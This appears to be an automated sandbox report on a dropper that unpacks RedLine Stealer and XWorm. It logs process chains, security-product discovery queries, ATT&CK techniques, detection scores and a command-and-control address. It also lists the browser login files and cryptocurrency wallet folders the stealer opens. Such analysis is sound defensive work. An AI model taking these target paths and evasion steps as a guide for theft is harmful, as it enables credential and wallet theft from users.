Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Code function: 6_2_00EF0D8A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_00EF0D8A
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Code function: 6_2_00EF4FEF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_00EF4FEF

Source: C:\Users\user\AppData\Local\Temp\3.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\KR6CT3hIxT.exe

Code function: 0_2_00007FF7E1DDB190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,

0_2_00007FF7E1DDB190

Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Process created: C:\Users\user\AppData\Local\Temp\4.exe "C:\Users\user\AppData\Local\Temp\4.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4.exe	Process created: C:\Users\user\AppData\Local\Temp\3.exe "C:\Users\user\AppData\Local\Temp\3.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Process created: C:\Users\user\AppData\Local\Temp\rdegje.exe "C:\Users\user\AppData\Local\Temp\rdegje.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Process created: C:\Users\user\AppData\Local\Temp\r.exe "C:\Users\user\AppData\Local\Temp\r.exe"	Jump to behavior

Source: C:\Users\user\Desktop\KR6CT3hIxT.exe

Code function: 0_2_00007FF7E1DF58E0 cpuid

0_2_00007FF7E1DF58E0

Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Code function: GetLocaleInfoW,GetNumberFormatW,	0_2_00007FF7E1DDA2CC
Source: C:\Users\user\AppData\Local\Temp\4.exe	Code function: GetLocaleInfoW,GetNumberFormatW,	1_2_00B7C093
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Code function: GetLocaleInfoW,GetNumberFormatW,	6_2_00EEC093

Source: C:\Users\user\AppData\Local\Temp\3.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\KR6CT3hIxT.exe

Code function: 0_2_00007FF7E1DE0754 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,MapViewOfFile,UnmapViewOfFile,CloseHandle,SetEnvironmentVariableW,GetLocalTime,swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,OleUninitialize,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,

0_2_00007FF7E1DE0754

Source: C:\Users\user\Desktop\KR6CT3hIxT.exe

Code function: 0_2_00007FF7E1DC51A4 GetVersionExW,

0_2_00007FF7E1DC51A4

Source: C:\Users\user\AppData\Local\Temp\3.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: r.exe, 00000007.00000002.2183831567.0000000006EF2000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\Temp\3.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\r.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\r.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\r.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\r.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\r.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\r.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 7.2.r.exe.e10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2159289645.0000000000E12000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: r.exe PID: 7776, type: MEMORYSTR

Yara detected XWorm

Source: Yara match	File source: 2.2.3.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.4149652457.0000000000F12000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4157787084.0000000003381000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 3.exe PID: 7308, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\r.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\r.exe	File opened: C:\Users\user\AppData\Roaming\atomic\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\	Jump to behavior

Source: Yara match	File source: 7.2.r.exe.e10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2159289645.0000000000E12000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: r.exe PID: 7776, type: MEMORYSTR

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 7.2.r.exe.e10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2159289645.0000000000E12000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: r.exe PID: 7776, type: MEMORYSTR

Yara detected XWorm

Source: Yara match	File source: 2.2.3.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.4149652457.0000000000F12000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4157787084.0000000003381000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 3.exe PID: 7308, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	221 Windows Management Instrumentation	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	2 File and Directory Discovery	Remote Desktop Protocol	2 Data from Local System	11 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	11 Process Injection	3 Obfuscated Files or Information	Security Account Manager	138 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	13 Software Packing	NTDS	871 Security Software Discovery	Distributed Component Object Model	Input Capture	12 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	1 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	561 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	561 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	11 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
KR6CT3hIxT.exe	37%	ReversingLabs	Win64.Trojan.Smokeloader
KR6CT3hIxT.exe	55%	Virustotal		Browse
KR6CT3hIxT.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\3.exe	100%	Avira	TR/Crypt.XPACK.Gen
C:\Users\user\AppData\Local\Temp\r.exe	100%	Avira	TR/Crypt.XPACK.Gen
C:\Users\user\AppData\Local\Temp\rdegje.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\3.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\4.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\r.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\3.exe	49%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\3.exe	55%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\4.exe	41%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\4.exe	44%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\r.exe	53%	ReversingLabs
C:\Users\user\AppData\Local\Temp\r.exe	53%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\rdegje.exe	34%	ReversingLabs	ByteCode-MSIL.Trojan.RedLine
C:\Users\user\AppData\Local\Temp\rdegje.exe	35%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\winrar-x64-701.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\winrar-x64-701.exe	0%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
api.ip.sb	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://ipinfo.io/ip%appdata%	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous	0%	URL Reputation	safe
http://schemas.datacontract.org/2004/07/	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX	0%	URL Reputation	safe
https://api.ip.sb/geoip%USERPEnvironmentROFILE%	0%	URL Reputation	safe
https://api.ip.sb	0%	URL Reputation	safe
http://schemas.xmlsoap.org/soap/envelope/	0%	URL Reputation	safe
http://tempuri.org/	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://api.ipify.orgcookies//settinString.Removeg	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/08/addressing	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
http://schemas.xmlsoap.org/soap/actor/next	0%	URL Reputation	safe
195.2.75.12	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/CheckConnectResponse	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/EnvironmentSettings	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/CheckConnect	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Virustotal		Browse
http://tempuri.org/Endpoint/VerifyUpdateResponse	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Virustotal		Browse
http://tempuri.org/Endpoint/SetEnvironment	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/SetEnvironmentResponse	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Virustotal		Browse
http://tempuri.org/Endpoint/EnvironmentSettings	2%	Virustotal		Browse
http://tempuri.org/Endpoint/CheckConnect	2%	Virustotal		Browse
http://tempuri.org/Endpoint/GetUpdates	0%	Avira URL Cloud	safe
https://api.ip.sb/geoip%USERPEnvironmentROFILE	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/CheckConnectResponse	1%	Virustotal		Browse
https://api.ipify.orgcookies//setti	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/VerifyUpdateResponse	1%	Virustotal		Browse
http://tempuri.org/Endpoint/SetEnvironmentResponse	1%	Virustotal		Browse
http://tempuri.org/Endpoint/SetEnvironment	1%	Virustotal		Browse
http://tempuri.org/Endpoint/GetUpdatesResponse	0%	Avira URL Cloud	safe
http://195.2.75.12:54762	0%	Avira URL Cloud	safe
http://ns.adp/1.0/	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/EnvironmentSettingsResponse	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/GetUpdates	1%	Virustotal		Browse
http://tempuri.org/Endpoint/VerifyUpdate	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/GetUpdatesResponse	1%	Virustotal		Browse
http://tempuri.org/0	0%	Avira URL Cloud	safe
https://api.ip.sb/geoip%USERPEnvironmentROFILE	0%	Virustotal		Browse
195.2.75.12:54762	0%	Avira URL Cloud	safe
http://195.2.75.12:54762/	0%	Avira URL Cloud	safe
http://ns.microsofo/1.2/	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/VerifyUpdate	1%	Virustotal		Browse
195.2.75.12:54762	0%	Virustotal		Browse
http://tempuri.org/Endpoint/EnvironmentSettingsResponse	1%	Virustotal		Browse
http://195.2.75.12:54762	0%	Virustotal		Browse
http://tempuri.org/0	0%	Virustotal		Browse
http://195.2.75.12:54762/	0%	Virustotal		Browse
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.ip.sb	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
195.2.75.12	true	Avira URL Cloud: safe	unknown
195.2.75.12:54762	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://195.2.75.12:54762/	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ipinfo.io/ip%appdata%	r.exe, r.exe, 00000007.00000002.2159289645.0000000000E12000.00000040.00000001.01000000.0000000D.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/chrome_newtab	r.exe, 00000007.00000002.2178396624.0000000004BEA000.00000004.00000800.00020000.00000000.sdmp, r.exe, 00000007.00000002.2178396624.0000000004B91000.00000004.00000800.00020000.00000000.sdmp, tmp626E.tmp.7.dr, tmp625D.tmp.7.dr, tmp2BF9.tmp.7.dr, tmp6280.tmp.7.dr, tmp2BD7.tmp.7.dr, tmp2BE8.tmp.7.dr, tmp626F.tmp.7.dr, tmp62B2.tmp.7.dr, tmp2C09.tmp.7.dr, tmp6290.tmp.7.dr, tmp624D.tmp.7.dr, tmp62A1.tmp.7.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	r.exe, 00000007.00000002.2178396624.0000000004BEA000.00000004.00000800.00020000.00000000.sdmp, r.exe, 00000007.00000002.2178396624.0000000004B91000.00000004.00000800.00020000.00000000.sdmp, tmp626E.tmp.7.dr, tmp625D.tmp.7.dr, tmp2BF9.tmp.7.dr, tmp6280.tmp.7.dr, tmp2BD7.tmp.7.dr, tmp2BE8.tmp.7.dr, tmp626F.tmp.7.dr, tmp62B2.tmp.7.dr, tmp2C09.tmp.7.dr, tmp6290.tmp.7.dr, tmp624D.tmp.7.dr, tmp62A1.tmp.7.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	r.exe, 00000007.00000002.2178396624.0000000004BEA000.00000004.00000800.00020000.00000000.sdmp, r.exe, 00000007.00000002.2178396624.0000000004B91000.00000004.00000800.00020000.00000000.sdmp, tmp626E.tmp.7.dr, tmp625D.tmp.7.dr, tmp2BF9.tmp.7.dr, tmp6280.tmp.7.dr, tmp2BD7.tmp.7.dr, tmp2BE8.tmp.7.dr, tmp626F.tmp.7.dr, tmp62B2.tmp.7.dr, tmp2C09.tmp.7.dr, tmp6290.tmp.7.dr, tmp624D.tmp.7.dr, tmp62A1.tmp.7.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous	r.exe, 00000007.00000002.2165535966.0000000003A51000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/CheckConnectResponse	r.exe, 00000007.00000002.2165535966.0000000003A51000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.datacontract.org/2004/07/	r.exe, 00000007.00000002.2165535966.0000000003BB6000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX	r.exe, 00000007.00000002.2165535966.0000000003A51000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/EnvironmentSettings	r.exe, 00000007.00000002.2165535966.0000000003A51000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.ip.sb/geoip%USERPEnvironmentROFILE%	r.exe, r.exe, 00000007.00000002.2159289645.0000000000E12000.00000040.00000001.01000000.0000000D.sdmp	false	URL Reputation: safe	unknown
https://api.ip.sb	r.exe, 00000007.00000002.2165535966.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/soap/envelope/	r.exe, 00000007.00000002.2165535966.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	r.exe, 00000007.00000002.2178396624.0000000004BEA000.00000004.00000800.00020000.00000000.sdmp, r.exe, 00000007.00000002.2178396624.0000000004B91000.00000004.00000800.00020000.00000000.sdmp, tmp626E.tmp.7.dr, tmp625D.tmp.7.dr, tmp2BF9.tmp.7.dr, tmp6280.tmp.7.dr, tmp2BD7.tmp.7.dr, tmp2BE8.tmp.7.dr, tmp626F.tmp.7.dr, tmp62B2.tmp.7.dr, tmp2C09.tmp.7.dr, tmp6290.tmp.7.dr, tmp624D.tmp.7.dr, tmp62A1.tmp.7.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/	r.exe, 00000007.00000002.2165535966.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/CheckConnect	r.exe, 00000007.00000002.2165535966.0000000003A51000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	r.exe, 00000007.00000002.2178396624.0000000004BEA000.00000004.00000800.00020000.00000000.sdmp, r.exe, 00000007.00000002.2178396624.0000000004B91000.00000004.00000800.00020000.00000000.sdmp, tmp626E.tmp.7.dr, tmp625D.tmp.7.dr, tmp2BF9.tmp.7.dr, tmp6280.tmp.7.dr, tmp2BD7.tmp.7.dr, tmp2BE8.tmp.7.dr, tmp626F.tmp.7.dr, tmp62B2.tmp.7.dr, tmp2C09.tmp.7.dr, tmp6290.tmp.7.dr, tmp624D.tmp.7.dr, tmp62A1.tmp.7.dr	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	r.exe, 00000007.00000002.2178396624.0000000004BEA000.00000004.00000800.00020000.00000000.sdmp, r.exe, 00000007.00000002.2178396624.0000000004B91000.00000004.00000800.00020000.00000000.sdmp, tmp626E.tmp.7.dr, tmp625D.tmp.7.dr, tmp2BF9.tmp.7.dr, tmp6280.tmp.7.dr, tmp2BD7.tmp.7.dr, tmp2BE8.tmp.7.dr, tmp626F.tmp.7.dr, tmp62B2.tmp.7.dr, tmp2C09.tmp.7.dr, tmp6290.tmp.7.dr, tmp624D.tmp.7.dr, tmp62A1.tmp.7.dr	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/VerifyUpdateResponse	r.exe, 00000007.00000002.2165535966.0000000003A51000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/SetEnvironment	r.exe, 00000007.00000002.2165535966.0000000003BB6000.00000004.00000800.00020000.00000000.sdmp, r.exe, 00000007.00000002.2165535966.0000000003A51000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/SetEnvironmentResponse	r.exe, 00000007.00000002.2165535966.0000000003A51000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/GetUpdates	r.exe, 00000007.00000002.2165535966.0000000003C52000.00000004.00000800.00020000.00000000.sdmp, r.exe, 00000007.00000002.2165535966.0000000003A51000.00000004.00000800.00020000.00000000.sdmp, r.exe, 00000007.00000002.2165535966.0000000003ACA000.00000004.00000800.00020000.00000000.sdmp, r.exe, 00000007.00000002.2165535966.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
